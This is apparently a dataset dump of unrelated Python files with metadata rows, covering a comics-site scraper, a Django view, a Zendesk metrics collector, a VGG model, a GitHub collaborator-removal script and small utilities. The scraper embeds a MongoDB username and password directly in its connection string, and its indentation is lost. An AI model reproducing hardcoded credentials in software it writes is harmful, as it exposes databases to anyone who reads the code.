# allowed_domains = ['truyenqq.com']
# start_urls = ['http://truyenqq.com/']
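    # NOTE: credentials are embedded in the connection URI below; in a real
    # deployment these should come from environment variables or a secrets store.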
client = pymongo.MongoClient("mongodb+srv://vncomics:vncomics@cluster0-6ulnw.mongodb.net/vncomics?retryWrites=true&w=majority")
db = client.vncomics
comics = db.comics
def get_url(self):
while True:
row = self.comics.find_one({"body": {"$exists": False}, "referer": self.name})
if row:
resp = requests.head(row['url'])
if resp.status_code == 404:
self.comics.delete_one({"_id": row['_id']})
else:
return row
else:
return None
pass
def start_requests(self):
self.row = self.get_url()
if self.row:
yield scrapy.Request(url=self.row['url'], callback=self.parse)
pass
def parse(self, response):
item_altName = None
item_body = response.css('.main-content .center .story-detail-info').extract_first()
item_body = re.sub(r'<(.*?)>', '', item_body).strip()
item_status = response.css('.main-content .center .txt .info-item:nth-child(2)::text').extract_first()
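        # "Tình trạng: Đang Cập Nhật" means "Status: Updating", i.e. the series is still ongoing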
if item_status == "Tình trạng: Đang Cập Nhật":
item_status = 0
else:
item_status = 1
item_categories = response.css('.main-content .center .list01 li a::text').getall()
item_authors = response.css('.main-content .center .txt .info-item:nth-child(1) a::text').getall()
item_chapterNames = response.css('.main-content .works-chapter-list .row a::text').getall()
item_chapterUrls = response.css('.main-content .works-chapter-list .row a::attr(href)').getall()
        # default the counters so they exist even when the stat icons are missing
        item_viewed = 0
        item_followed = 0
        for sp01 in response.css('.main-content .center .txt div .sp01'):
if sp01.css('.fa-heart'):
item_followed = int(sp01.css('.sp02::text').extract_first().replace(',', ''))
if sp01.css('.fa-eye'):
item_viewed = int(sp01.css('.sp02::text').extract_first().replace(',', ''))
item_updatedAt = None
obj = DetailsItem(
comicId=self.row['_id'],
name=self.row['name'],
altName=item_altName,
body=item_body,
status=item_status,
categories=item_categories,
authors=item_authors,
chapterNames=item_chapterNames,
chapterUrls=item_chapterUrls,
viewed=item_viewed,
followed=item_followed,
updatedAt=item_updatedAt,
referer=self.name
)
yield obj
# next url
time.sleep(3)
self.row = self.get_url()
if self.row:
yield scrapy.Request(url=self.row['url'], callback=self.parse)
pass
| 35.27907 | 131 | 0.575808 | 351 | 3,034 | 4.860399 | 0.356125 | 0.032825 | 0.061547 | 0.09027 | 0.290152 | 0.257327 | 0.239156 | 0.239156 | 0.19578 | 0.146542 | 0 | 0.013432 | 0.288398 | 3,034 | 85 | 132 | 35.694118 | 0.776748 | 0.033949 | 0 | 0.173913 | 0 | 0.028986 | 0.185578 | 0.050239 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0.043478 | 0.101449 | 0 | 0.246377 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bb4934e053b5ee79225aaffff2965e5f1acee34 | 1,902 | py | Python | apps/article/views/pages/category.py | codelieche/codelieche.com | 8f18a9f4064af81a6dd0203fbaa138565065fff5 | [
"MIT"
] | 2 | 2017-06-11T16:41:48.000Z | 2017-06-14T00:32:27.000Z | apps/article/views/pages/category.py | codelieche/codelieche.com | 8f18a9f4064af81a6dd0203fbaa138565065fff5 | [
"MIT"
] | 13 | 2020-02-11T21:33:40.000Z | 2022-03-11T23:12:16.000Z | apps/article/views/pages/category.py | codelieche/codelieche.com | 8f18a9f4064af81a6dd0203fbaa138565065fff5 | [
"MIT"
] | null | null | null | # -*- coding:utf-8 -*-
from django.shortcuts import get_object_or_404, render
from django.views.generic import View
from django.core.paginator import Paginator
from article.models import Category, Post
from article.utils import get_page_num_list
class ArticleListView(View):
"""
分类文章列表View
"""
def get(self, request, slug, page=None):
# 第1步:先获取到当前分类
category = get_object_or_404(Category, slug=slug)
# 第2步:获取分类的所有文章
# 博客文章分类,只设置了2级,没有多级的,所以不需要对sub_category再次进行取子集
# sub_categories = category.category_set.all()
sub_categories = category.subs.all()
# 超级用户可以查看所有文章【包含删除的】
if request.user.is_superuser:
all_posts = Post.objects.filter(category=category)
# 联合sub_category的文章
if sub_categories:
sub_posts = Post.objects.filter(category__in=sub_categories)
# 文章只能有一个分类,所以不会取到重复对象的
all_posts = all_posts.union(sub_posts)
else:
all_posts = Post.published.filter(category=category)
# 联合sub_category的文章
if sub_categories:
sub_posts = Post.objects.filter(category__in=sub_categories)
# 文章只能有一个分类,所以不会取到重复对象的
all_posts = all_posts.union(sub_posts)
# 文章倒序排列,最新的文章放前面
all_posts = all_posts.order_by("-id")
if page:
page_num = int(page)
else:
page_num = 1
p = Paginator(all_posts, 10)
posts = p.page(page_num)
page_count = p.num_pages
# 获取分页器的页码列表,得到当前页面最近的7个页码列表
page_num_list = get_page_num_list(page_count, page_num, 7)
content = {
'posts': posts,
'category': category,
'last_page': page_count,
'page_num_list': page_num_list
}
return render(request, 'article/list.html', content)
| 31.7 | 76 | 0.615668 | 215 | 1,902 | 5.186047 | 0.381395 | 0.056502 | 0.049327 | 0.059193 | 0.283408 | 0.269058 | 0.269058 | 0.269058 | 0.269058 | 0.269058 | 0 | 0.011244 | 0.298633 | 1,902 | 59 | 77 | 32.237288 | 0.824588 | 0.154048 | 0 | 0.228571 | 0 | 0 | 0.034766 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028571 | false | 0 | 0.142857 | 0 | 0.228571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bb7dcb6bea70b57e941c03e794281139890eb69 | 5,739 | py | Python | app/app.py | nepworldwide/nepms-zendesk-stats | 7bed10e65b2b6f6d4d1dbbf0c79a0e716d87d517 | [
"MIT"
] | null | null | null | app/app.py | nepworldwide/nepms-zendesk-stats | 7bed10e65b2b6f6d4d1dbbf0c79a0e716d87d517 | [
"MIT"
] | null | null | null | app/app.py | nepworldwide/nepms-zendesk-stats | 7bed10e65b2b6f6d4d1dbbf0c79a0e716d87d517 | [
"MIT"
] | null | null | null | import argparse
import yaml
import logging
import os
import sys
import time
from schema import Schema, SchemaError
import requests
from prometheus_client import CollectorRegistry, Gauge, push_to_gateway
from apscheduler.schedulers.background import BlockingScheduler
class Config(object):
def __init__(self):
# Set up config path
self.config_data = None
self.config_file = os.path.dirname(os.path.realpath(__file__)) + "/config/config.yml"
def load(self, check=True):
with open(self.config_file, 'r') as stream:
try:
self.config_data = yaml.safe_load(stream)
except yaml.YAMLError as e:
                print(f'Configuration file cannot be parsed. Error: {e}')
if check:
self.check()
return self.config_data
def check(self):
# Expected model of the schema of the config
config_schema = Schema({
'pushgateway': {
'host': str,
'job': {
'zendesk-ticket-count': {
'interval': int
}
}
},
'zendesk-ticket-count': {
'base_url': str,
'search_api': str,
'zendesk_api_user': str,
'zendesk_api_token': str,
'filter': {
'status': list,
'tag': list
}
}
})
try:
config_schema.validate(self.config_data)
except SchemaError as e:
logging.error(f'Configuration schema is not valid. {e}')
sys.exit()
else:
logging.debug('Configuration schema is valid')
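    # Example config/config.yml matching the schema above (all values are
    # illustrative, not defaults shipped with the app):
    #
    # pushgateway:
    #   host: "localhost:9091"
    #   job:
    #     zendesk-ticket-count:
    #       interval: 300
    # zendesk-ticket-count:
    #   base_url: "https://example.zendesk.com"
    #   search_api: "/api/v2/search.json"
    #   zendesk_api_user: "user@example.com"
    #   zendesk_api_token: "secret-token"
    #   filter:
    #     status: ["open", "pending"]
    #     tag: ["billing", "outage"]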

class ZendeskApi(object):
    def __init__(self, zendesk_config):
        self.api_url = zendesk_config['base_url'] + zendesk_config['search_api']
        self.user = zendesk_config['zendesk_api_user']
        self.token = zendesk_config['zendesk_api_token']
        self.filter = zendesk_config['filter']

    def get(self, params):
        logging.info(f'GET "{self.api_url}" with params "{params}"')
        response = requests.get(self.api_url, params=params, auth=(self.user + "/token", self.token))
        try:
            response.raise_for_status()
        except requests.HTTPError as e:
            logging.error(f'Response HTTP code - "{response.status_code}". Content - {e.response.content}')
        else:
            logging.info(f"API responded in {response.elapsed.total_seconds()} seconds")
        return response.json()

    def load(self):
        data = {}
        for tag in self.filter['tag']:
            data.update({tag: {}})
            for status in self.filter['status']:
                request_data = self.get({'query': f'type:ticket tags:{tag} status:{status}'})
                data[tag].update({status: request_data['count']})
        return data

class Pushgateway(object):
    def __init__(self, host, job_name, data):
        # init registry
        self.registry = CollectorRegistry()
        self.pushgateway_host = host
        self.job_name = job_name
        self.ticket_status_g = Gauge(
            "zendesk_tickets_status",
            "Zendesk ticket status",
            ["tag", "status"],
            registry=self.registry,
        )
        for tag in data:
            for status in data[tag]:
                self.ticket_status_g.labels(tag=tag, status=status).set(data[tag][status])

    def push(self):
        try:
            logging.info(f'Sending data to Prometheus host: "{self.pushgateway_host}", job - "{self.job_name}"')
            push_start_time = time.time()
            push_to_gateway(self.pushgateway_host, job=self.job_name, registry=self.registry)
            push_end_time = time.time()
            push_duration = push_end_time - push_start_time
            logging.info(f"Successfully sent data to Prometheus. Time taken - {push_duration} seconds")
        except Exception as e:
            logging.error(f"Failed to send data to Prometheus. Msg - {e}")

def log_level_switch(log_level):
    return dict(error=logging.ERROR, info=logging.INFO, debug=logging.DEBUG)[log_level]


def zendesk_ticket_count(config_data):
    logging.info('Job has been started')
    start = time.time()
    zendesk_ticket_count_data = ZendeskApi(config_data['zendesk-ticket-count']).load()
    Pushgateway(config_data['pushgateway']['host'], 'zendesk-ticket-count', zendesk_ticket_count_data).push()
    logging.info(f"Job has finished in {time.time() - start} seconds")

if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description="Prometheus collector for zendesk ticket status based on tag"
    )
    parser.add_argument(
        "-l",
        "--log-level",
        type=str,
        required=False,
        default="info",
        help="default info [error, info, debug]",
    )
    args = parser.parse_args()
    logging.basicConfig(level=log_level_switch(args.log_level))

    logging.info("Loading configuration")
    config_data = Config().load()
    logging.info("Configuration has been loaded successfully")

    # init scheduler
    scheduler = BlockingScheduler()

    # configure scheduler
    # zendesk-ticket-count
    schedule_id = 'zendesk-ticket-count'
    schedule_name = 'zendesk-ticket-count'
    schedule_interval = config_data['pushgateway']['job'][schedule_name]['interval']
    logging.info(f'Scheduling "{schedule_id}", will be run every {schedule_interval} seconds')
    scheduler.add_job(
        zendesk_ticket_count,
        'interval',
        [config_data],
        seconds=schedule_interval,
        id=schedule_id,  # pass the variable, not the literal string 'schedule_id'
    )

    # start scheduler
    scheduler.start()
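
# A minimal config/config.yml sketch inferred from the Schema above; the host,
# credentials, and filter values are illustrative placeholders only:
#
#   pushgateway:
#     host: "pushgateway.example.com:9091"
#     job:
#       zendesk-ticket-count:
#         interval: 300
#   zendesk-ticket-count:
#     base_url: "https://example.zendesk.com"
#     search_api: "/api/v2/search.json"
#     zendesk_api_user: "user@example.com"
#     zendesk_api_token: "secret-token"
#     filter:
#       status: ["new", "open", "pending"]
#       tag: ["billing", "support"]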
| 33.758824 | 112 | 0.605855 | 653 | 5,739 | 5.136294 | 0.249617 | 0.050388 | 0.059034 | 0.015206 | 0.051282 | 0.019678 | 0.019678 | 0 | 0 | 0 | 0 | 0 | 0.282628 | 5,739 | 169 | 113 | 33.95858 | 0.814671 | 0.025614 | 0 | 0.058394 | 0 | 0 | 0.228551 | 0.019165 | 0 | 0 | 0 | 0 | 0 | 1 | 0.072993 | false | 0 | 0.072993 | 0.007299 | 0.19708 | 0.007299 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bb9142eb89bd3dd107533c878c67b880a33eb33 | 501 | py | Python | mongodb/webScrapper/courseFilter.py | ISHITA006/STARS-Course-Registration-Application | a7a208f5b7e3aa4b4f652bf2b6432b038b76c346 | [
"MIT"
] | 1 | 2022-02-16T08:25:53.000Z | 2022-02-16T08:25:53.000Z | mongodb/webScrapper/courseFilter.py | ISHITA006/STARS-Course-Registration-Application | a7a208f5b7e3aa4b4f652bf2b6432b038b76c346 | [
"MIT"
] | null | null | null | mongodb/webScrapper/courseFilter.py | ISHITA006/STARS-Course-Registration-Application | a7a208f5b7e3aa4b4f652bf2b6432b038b76c346 | [
"MIT"
] | null | null | null | import json
import os

f = open('ntu_mods.json', "r")
mod_json = json.loads(f.read())
f.close()

filtered_dict = {}
count = 0
for course in mod_json['COURSES']:
    if "CE" in course['COURSE']:
        filtered_dict = course
        count += 1
        path = os.path.abspath("./courses/" + course['COURSE'] + ".json")
        with open(path, "w") as outfile:
            json.dump(filtered_dict, outfile)
        # the with-block closes outfile automatically
        filtered_dict = {}
print("Number of CE courses filtered:", count)
| 25.05 | 73 | 0.590818 | 66 | 501 | 4.378788 | 0.5 | 0.16609 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005376 | 0.257485 | 501 | 19 | 74 | 26.368421 | 0.771505 | 0 | 0 | 0.125 | 0 | 0 | 0.161677 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0.0625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bbc03dd34b0d6ae5babb01f31f01fe13fbcb7bf | 2,545 | py | Python | graphs/models/vgg.py | bigdata-inha/Rethinking_network_pruning | d68dfeb6d31f5fee2f066ceec92bcb24867de345 | [
"MIT"
] | null | null | null | graphs/models/vgg.py | bigdata-inha/Rethinking_network_pruning | d68dfeb6d31f5fee2f066ceec92bcb24867de345 | [
"MIT"
] | 2 | 2020-12-04T07:28:01.000Z | 2022-02-27T03:07:59.000Z | graphs/models/vgg.py | bigdata-inha/Rethinking_network_pruning | d68dfeb6d31f5fee2f066ceec92bcb24867de345 | [
"MIT"
] | null | null | null | """VGG11/13/16/19 in Pytorch."""
import torch
import torch.nn as nn


cfg = {
    'VGG11': [64, 'M', 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
    'VGG13': [64, 64, 'M', 128, 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
    'VGG16': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M'],
    'VGG19': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 256, 'M', 512, 512, 512, 512, 'M', 512, 512, 512, 512, 'M'],
}


class VGG(nn.Module):
    def __init__(self, vgg_name, input_shape=224, num_classes=1000, batch_norm=False, init_weights=True):
        super(VGG, self).__init__()
        self.features = self._make_layers(cfg[vgg_name], batch_norm=batch_norm)
        self.classifier = nn.Sequential(
            nn.Linear(512 * int(input_shape/2**5) * int(input_shape/2**5), 4096),
            nn.ReLU(inplace=True),
            nn.Dropout(),
            nn.Linear(4096, 4096),
            nn.ReLU(inplace=True),
            nn.Dropout(),
            nn.Linear(4096, num_classes),
        )
        if init_weights:
            self._initialize_weights()

    def forward(self, x):
        out = self.features(x)
        out = out.view(out.size(0), -1)
        out = self.classifier(out)
        return out

    def _make_layers(self, cfg, batch_norm=False):
        layers = []
        in_channels = 3
        for m in cfg:
            if m == 'M':
                layers += [nn.MaxPool2d(kernel_size=2, stride=2)]
            else:
                conv2d = nn.Conv2d(in_channels, m, kernel_size=3, padding=1)
                if batch_norm:
                    layers += [conv2d, nn.BatchNorm2d(m), nn.ReLU(inplace=True)]
                else:
                    layers += [conv2d, nn.ReLU(inplace=True)]
                in_channels = m
        return nn.Sequential(*layers)

    def _initialize_weights(self):
        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
                if m.bias is not None:
                    nn.init.constant_(m.bias, 0)
            elif isinstance(m, nn.BatchNorm2d):
                nn.init.constant_(m.weight, 1)
                nn.init.constant_(m.bias, 0)
            elif isinstance(m, nn.Linear):
                nn.init.normal_(m.weight, 0, 0.01)
                nn.init.constant_(m.bias, 0)


def vgg16(input_shape, num_classes, batch_norm=False):
    return VGG('VGG16', input_shape, num_classes, batch_norm=batch_norm, init_weights=True)
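
# A minimal usage sketch, not part of the original module; the 32x32 input
# size and 10 classes are illustrative (CIFAR-style), chosen so that
# 512 * (32 / 2**5)**2 = 512 matches the first classifier layer.
if __name__ == "__main__":
    model = vgg16(input_shape=32, num_classes=10, batch_norm=True)
    x = torch.randn(2, 3, 32, 32)  # dummy batch of two RGB images
    logits = model(x)
    print(logits.shape)  # expected: torch.Size([2, 10])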
| 37.985075 | 117 | 0.539882 | 349 | 2,545 | 3.790831 | 0.246418 | 0.063492 | 0.042328 | 0.030234 | 0.322751 | 0.29932 | 0.281179 | 0.195011 | 0.188964 | 0.157218 | 0 | 0.116883 | 0.304126 | 2,545 | 66 | 118 | 38.560606 | 0.630152 | 0.010216 | 0 | 0.160714 | 0 | 0 | 0.022682 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.089286 | false | 0 | 0.035714 | 0.017857 | 0.196429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bbce0ad3c838fa381d3b09478b10889eda211b9 | 841 | py | Python | interfaces/func_description.py | hriener/party-elli | e7636a8045a46cd988a3a05b4b888577afb97708 | [
"MIT"
] | 9 | 2016-04-04T07:13:02.000Z | 2021-11-08T12:15:33.000Z | interfaces/func_description.py | hriener/party-elli | e7636a8045a46cd988a3a05b4b888577afb97708 | [
"MIT"
] | 1 | 2020-04-12T18:44:26.000Z | 2020-04-12T18:44:26.000Z | interfaces/func_description.py | hriener/party-elli | e7636a8045a46cd988a3a05b4b888577afb97708 | [
"MIT"
] | 2 | 2019-02-25T13:54:55.000Z | 2020-04-07T14:00:36.000Z | from typing import Dict

class FuncDesc:
    def __init__(self,
                 func_name:str,
                 type_by_arg:Dict[str, str],
                 output_ty:str):
        self.name = func_name
        self.output_ty = output_ty
        self.ordered_argname_type_pairs = sorted(list(type_by_arg.items()),
                                                 key=lambda t_a: str(t_a[0]))

    def __str__(self):
        return '<name: {name}, inputs: {inputs}, output: {output}>'.format(
            name=self.name,
            inputs=str(self.ordered_argname_type_pairs),
            output=self.output_ty
        )

    def __eq__(self, other):
        if not isinstance(other, FuncDesc):
            return False
        return str(other) == str(self)

    def __hash__(self):
        return hash(str(self))

    __repr__ = __str__
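
# A brief usage sketch, not part of the original module; the function and
# argument names below are made up for illustration.
if __name__ == '__main__':
    fd1 = FuncDesc('add', {'a': 'int', 'b': 'int'}, 'int')
    fd2 = FuncDesc('add', {'b': 'int', 'a': 'int'}, 'int')
    # argument order is normalized by sorting, so the two descriptions compare equal
    assert fd1 == fd2 and hash(fd1) == hash(fd2)
    print(fd1)  # <name: add, inputs: [('a', 'int'), ('b', 'int')], output: int>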
| 28.033333 | 77 | 0.546968 | 99 | 841 | 4.222222 | 0.393939 | 0.083732 | 0.043062 | 0.105263 | 0.129187 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001832 | 0.350773 | 841 | 29 | 78 | 29 | 0.763736 | 0 | 0 | 0 | 0 | 0 | 0.059453 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.173913 | false | 0 | 0.043478 | 0.086957 | 0.478261 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bbd5acd96c506ff895add5fd69efd97917904ed | 1,001 | py | Python | github/delete/collaborator/src/formula/formula.py | rogerio-ignacio-developer/formulas-github | 12cf7401f31e4a6212289b839c02de1d612c8271 | [
"Apache-2.0"
] | 32 | 2021-01-27T17:43:23.000Z | 2022-03-23T18:00:41.000Z | github/delete/collaborator/src/formula/formula.py | rogerio-ignacio-developer/formulas-github | 12cf7401f31e4a6212289b839c02de1d612c8271 | [
"Apache-2.0"
] | 12 | 2021-01-26T18:14:59.000Z | 2021-10-04T12:24:41.000Z | github/delete/collaborator/src/formula/formula.py | rogerio-ignacio-developer/formulas-github | 12cf7401f31e4a6212289b839c02de1d612c8271 | [
"Apache-2.0"
] | 11 | 2021-01-28T13:54:24.000Z | 2022-03-16T12:16:27.000Z | #!/usr/bin/python3
import requests
import json

def run(token, username, repository, collaborator):
    url = f"https://api.github.com/repos/{username}/{repository}/collaborators/{collaborator}"
    authorization = f"token {token}"
    headers = {
        "Accept": "application/vnd.github.v3+json",
        "Authorization": authorization,
    }
    r1 = requests.get(
        url=url,
        headers=headers
    )
    if r1.status_code == 204:
        r2 = requests.delete(
            url=url,
            headers=headers
        )
        if r2.status_code == 204:
            print(f"✅ Collaborator \033[36m{collaborator}\033[0m successfully removed from {username}'s \033[36m{repository}\033[0m repository")
        else:
            print("❌ Couldn't delete the collaborator from the repository")
            print(r2.status_code, r2.reason)
    else:
        print(f"⚠️ Username \033[36m{collaborator}\033[0m isn't a \033[36m{repository}\033[0m repository collaborator")
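
# A hypothetical invocation; all four values are placeholders, and the token
# needs "repo" scope on the target repository:
# run("ghp_xxxx", "octocat", "hello-world", "someuser")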
| 27.805556 | 144 | 0.613387 | 118 | 1,001 | 5.211864 | 0.440678 | 0.039024 | 0.042276 | 0.065041 | 0.247154 | 0.100813 | 0 | 0 | 0 | 0 | 0 | 0.067568 | 0.260739 | 1,001 | 35 | 145 | 28.6 | 0.758108 | 0.016983 | 0 | 0.24 | 0 | 0.08 | 0.427263 | 0.144456 | 0 | 0 | 0 | 0 | 0 | 1 | 0.04 | false | 0 | 0.08 | 0 | 0.12 | 0.16 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bbd63f55e42c79ca4727c69d8e64efe299a4827 | 1,281 | py | Python | simulator/src/files/util.py | larashores/burridgeknopoffsimulator | 2201b266f8fde00325dc0321acc6aa3f3e2c66f8 | [
"MIT"
] | 1 | 2019-05-16T12:50:03.000Z | 2019-05-16T12:50:03.000Z | simulator/src/files/util.py | vinceshores/burridgeknopoffsimulator | 2201b266f8fde00325dc0321acc6aa3f3e2c66f8 | [
"MIT"
] | null | null | null | simulator/src/files/util.py | vinceshores/burridgeknopoffsimulator | 2201b266f8fde00325dc0321acc6aa3f3e2c66f8 | [
"MIT"
] | 1 | 2021-03-02T14:44:36.000Z | 2021-03-02T14:44:36.000Z | from files.datafile import DataFile
import glob
import os
import sys


def read_data(file_name):
    with open(file_name, 'rb') as file:
        data, index = DataFile.from_bytes(bytearray(file.read()))
    return data.get()


def write_data(file_name, data):
    data_file = DataFile()
    data_file.set(type(data), data)
    with open(file_name, 'wb') as file:
        file.write(data_file.to_bytes())


def get_single_file_name(*extensions):
    if len(sys.argv) == 1:
        files = []
        for ext in extensions:
            files.extend(glob.iglob('data/*.' + ext))
        return max(files, key=os.path.getctime)
    elif len(sys.argv) == 2:
        return os.path.join('data', sys.argv[1])
    else:
        raise TypeError('Usage: [filename]')


def get_all_file_names(*extensions):
    if len(sys.argv) == 1:
        files = []
        for ext in extensions:
            files.extend(glob.iglob('data/*.' + ext))
        return files


def data_desc(data):
    info = data.run_info
    return (f'rows: {info.rows}\n' +
            f'cols: {info.cols}\n' +
            f'L: {info.spring_length}\n' +
            f'v: {info.plate_velocity}\n' +
            f'a: {info.alpha}\n' +
            f'l: {info.l}\n' +
            f'dt: {info.time_interval}')
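
# A write/read round-trip sketch (illustrative; it assumes DataFile.set/get
# simply wrap the stored object, and that 'data/example.dat' is writable):
# write_data('data/example.dat', my_data_object)
# restored = read_data('data/example.dat')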
| 25.62 | 65 | 0.571429 | 179 | 1,281 | 3.96648 | 0.385475 | 0.016901 | 0.042254 | 0.04507 | 0.222535 | 0.222535 | 0.222535 | 0.222535 | 0.222535 | 0.222535 | 0 | 0.004334 | 0.279469 | 1,281 | 49 | 66 | 26.142857 | 0.764897 | 0 | 0 | 0.210526 | 0 | 0 | 0.153005 | 0.035129 | 0 | 0 | 0 | 0 | 0 | 1 | 0.131579 | false | 0 | 0.105263 | 0 | 0.368421 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bbdc792215a8ce6952b1d5568327d6cf71b3813 | 845 | py | Python | pir.py | lionyhw/PlanetX_MicroPython | 0bcbb637be9971260c32846acec3ecbd60df647c | [
"MIT"
] | 2 | 2020-08-06T07:32:57.000Z | 2022-02-11T02:37:21.000Z | pir.py | lionyhw/PlanetX_MicroPython | 0bcbb637be9971260c32846acec3ecbd60df647c | [
"MIT"
] | null | null | null | pir.py | lionyhw/PlanetX_MicroPython | 0bcbb637be9971260c32846acec3ecbd60df647c | [
"MIT"
] | 1 | 2021-09-11T02:34:39.000Z | 2021-09-11T02:34:39.000Z | from microbit import *
from enum import *


class PIR(object):
    """Passive infrared (PIR) sensor: human-body / motion detection.

    Args:
        RJ_pin (pin): the connector port (J1-J4) the sensor is plugged into
    """
    def __init__(self, RJ_pin):
        if RJ_pin == J1:
            self.__pin = pin8
        elif RJ_pin == J2:
            self.__pin = pin12
        elif RJ_pin == J3:
            self.__pin = pin14
        elif RJ_pin == J4:
            self.__pin = pin16

    def PIR_is_decection(self) -> bool:
        """Check whether a person or motion is detected.

        Returns:
            boolean: True if detected, False otherwise
        """
        if self.__pin.read_digital():
            return True
        else:
            return False


if __name__ == '__main__':
    sensor = PIR(J1)
    while True:
        if sensor.PIR_is_decection():
            display.show(Image.HAPPY)
        else:
            display.show(Image.SAD)
| 17.978723 | 42 | 0.504142 | 94 | 845 | 4.180851 | 0.531915 | 0.076336 | 0.068702 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023622 | 0.398817 | 845 | 46 | 43 | 18.369565 | 0.75 | 0.128994 | 0 | 0.083333 | 0 | 0 | 0.011887 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.083333 | 0 | 0.291667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bbe9f7c8be6cfdb5c273cc5d3e55754436428fd | 390 | py | Python | hive_gns/engine/pruner.py | imwatsi/hive-gns | c2b29b19245381af8ad0c055c0f0c14f331d5c10 | [
"MIT"
] | null | null | null | hive_gns/engine/pruner.py | imwatsi/hive-gns | c2b29b19245381af8ad0c055c0f0c14f331d5c10 | [
"MIT"
] | null | null | null | hive_gns/engine/pruner.py | imwatsi/hive-gns | c2b29b19245381af8ad0c055c0f0c14f331d5c10 | [
"MIT"
] | null | null | null | import time
from hive_gns.database.access import delete

class Pruner:

    @classmethod
    def delete_old_ops(cls):
        sql = """
            DELETE FROM gns.ops
            WHERE created <= NOW() - INTERVAL '30 DAYS';
        """
        return delete(sql)

    @classmethod
    def run_pruner(cls):
        while True:
            cls.delete_old_ops()
            time.sleep(300)
| 19.5 | 56 | 0.561538 | 46 | 390 | 4.630435 | 0.630435 | 0.131455 | 0.112676 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019608 | 0.346154 | 390 | 19 | 57 | 20.526316 | 0.815686 | 0 | 0 | 0.133333 | 0 | 0 | 0.251282 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0.133333 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bc01949d492a259d48585f6c5cb445301f6248e | 7,604 | py | Python | examples/example_sim_grad_bounce.py | NVIDIA/warp | fc7d3255435fc2fe6b54300e689f74e6d67418ca | [
"CNRI-Python-GPL-Compatible",
"Unlicense",
"0BSD",
"Apache-2.0",
"MIT"
